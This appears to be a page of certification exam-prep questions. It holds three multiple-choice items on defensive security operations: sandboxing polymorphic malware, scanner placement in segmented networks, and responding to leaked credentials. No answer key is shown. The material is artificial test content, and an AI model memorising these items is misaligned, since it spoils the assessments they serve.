Administrative controls

Full Access
Question # 105

A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that require a connection to the internet. The CPU has an idle process of at least 70%. Which of the following best describes how the security analyst can effectively review the malware without compromising the organization's network?

A.

Utilize an RDP session on an unused workstation to evaluate the malware.

B.

Disconnect and utilize an existing infected asset off the network.

C.

Create a virtual host for testing on the security analyst workstation.

D.

Subscribe to an online service to create a sandbox environment.

Full Access
Question # 106

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

A.

Deploy agents on all systems to perform the scans.

B.

Deploy a central scanner and perform non-credentialed scans.

C.

Deploy a cloud-based scanner and perform a network scan.

D.

Deploy a scanner sensor on every segment and perform credentialed scans.

Full Access
Question # 107

The SOC received a threat intelligence notification indicating that an employee's credentials were found on the dark web. The user's web and log-in activities were reviewed for malicious or anomalous connections, data uploads/downloads, and exploits. A review of the controls confirmed multifactor

authentication was enabled. Which of the following should be done first to mitigate impact to the business networks and assets?

A.

Perform a forced password reset.

B.

Communicate the compromised credentials to the user.

C.

Perform an ad hoc AV scan on the user's laptop.

D.

Review and ensure privileges assigned to the user's account reflect least privilege.

E.

Lower the thresholds for SOC alerting of suspected malicious activity.

Full Access